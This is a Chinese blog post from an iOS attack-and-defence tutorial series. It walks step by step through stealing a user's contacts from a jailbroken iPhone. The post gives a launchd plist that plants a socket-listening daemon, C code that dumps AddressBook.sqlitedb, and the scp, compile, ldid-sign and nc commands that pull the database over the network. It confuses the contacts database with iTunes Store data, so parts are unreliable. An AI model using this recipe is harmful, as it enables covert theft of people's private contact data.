說明
2016年7月15更新,最近試了一下,發現用nc拿不到資料了,拿資料的程式碼是沒有問題的,直接執行可以拿到資料,但是從mac通過IP和埠拿到的.sqlitedb檔案是空檔案,博主也正在看為什麼~大家有興趣可以一起找一下原因。
簡介
本文章基於念茜的iOS攻防系列。
本文將會講解如何竊取使用者的通訊錄資訊。
同樣在越獄手機環境下。
hack
1. 需要一個plist
需要這樣一個plist,它看起來是這樣:
原始檔是這樣:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Program</key> <string>/usr/bin/hack</string> <key>StandardErrorPath</key> <string>/dev/null</string> <key>SessionCreate</key> <true/> <key>ProgramArguments</key> <array> <string>/usr/bin/hack</string> </array> <key>inetdCompatibility</key> <dict> <key>Wait</key> <false/> </dict> <key>Sockets</key> <dict> <key>Listeners</key> <dict> <key>SockServiceName</key> <string>55</string> </dict> </dict> </dict> </plist> |
SockServiceName指的是通訊名稱
將plist檔案傳送到至iPhone/System/Library/LaunchDaemons/ 下
|
1 |
scp /Users/zhoulingyu/Desktop/hack.plist root@192.168.31.152:/System/Library/LaunchDaemons/hack.plist |
2. 瞭解一下OS X的啟動原理
- mac韌體啟用,初始化硬體,載入BootX引導器。
- BootX載入核心與核心擴充套件(kext)。
- 核心啟動launchd程式。
- launchd根據/System/Library/LaunchAgents、/System/Library/LaunchDaemons、/Library/LaunchDaemons、Library/LaunchAgents、~/Library/LaunchAgents裡的plist配置,啟動服務守護程式
解釋一下:
LaunchDaemons是使用者未登陸前就啟動的服務(守護程式)
LaunchAgents是使用者登陸後啟動的服務(守護程式)
幾個目錄下plist檔案格式及每個欄位的含義:
| KEY | DESCRIPTION | REQUIRED |
|---|---|---|
| Label | The name of the job | yes |
| ProgramArguments | Strings to pass to the program when it is executed | yes |
| UserName | The job will be run as the given user, who may not necessarily be the one who submitted it to launchd. | no |
| inetdCompatibility | Indicates that the daemon expects to be run as if it were launched by inetd | no |
| Program | The path to your executable. This key can save the ProgramArguments key for flags and arguments. | no |
| onDemand | A boolean flag that defines if a job runs continuously or not | no |
| RootDirectory | The job will be?chrooted?into another directory | no |
| ServiceIPC | Whether the daemon can speak IPC to launchd | no |
| WatchPaths | Allows launchd to start a job based on modifications at a file-system path | no |
| QueueDirectories | Similar to WatchPath, a queue will only watch an empty directory for new files | no |
| StartInterval | Used to schedule a job that runs on a repeating schedule. Specified as the number of seconds to wait between runs. | no |
| StartCalendarInterval | Job scheduling. The syntax is similar to cron. | no |
| HardResourceLimits | Controls restriction of the resources consumed by any job | no |
| LowPriorityIO | Tells the kernel that this task is of a low priority when doing file system I/O | no |
| Sockets | An array can be used to specify what socket the daemon will listen on for launch on demand | no |
iOS基本類似,我基本是參照這個來的。
所以上面的plist實際上是要求系統啟動一個程式。
一個名為hack的程式,可執行檔案的路徑是/usr/bin/hack。
3. 編寫讀取通訊錄資料程式
iTunes Store的資料都在/var/mobile/Library/AddressBook/AddressBook.sqlitedb中,只要能能拿出AddressBook.sqlitedb就可以非法拿到使用者的資料。
那麼現在編寫一個程式:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
#include <stdio.h> #include <fcntl.h> #include <stdlib.h> #define FILE "/var/mobile/Library/AddressBook/AddressBook.sqlitedb" int main(){ int fd = open(FILE, O_RDONLY); char buf[128]; int ret = 0; if(fd < 0) return -1; while (( ret = read(fd, buf, sizeof(buf))) > 0){ write( fileno(stdout), buf, ret); } close(fd); return 0; } |
用同樣的方法編譯、傳輸:
|
1 |
xcrun -sdk iphoneos clang -arch armv7 -o hack hack.c |
簽名:
|
1 2 |
ldid -S hack mv hack /usr/bin |
4. 抓取 iTunesstore 資料資訊
利用netcat,指定之前定義的服務名稱,抓取裝置 iTunesstore 資訊:
|
1 |
nc 192.168.31.152 55 > itunesstored2.sqlitedb |
OK,在MAC檢視一下內容。
有什麼問題都可以在博文後面留言,或者微博上私信我,或者郵件我coderfish@163.com。
博主主要寫javaEE和iOS的。
希望大家一起進步。
CSDN: CSDN部落格地址
我的微博:小魚周凌宇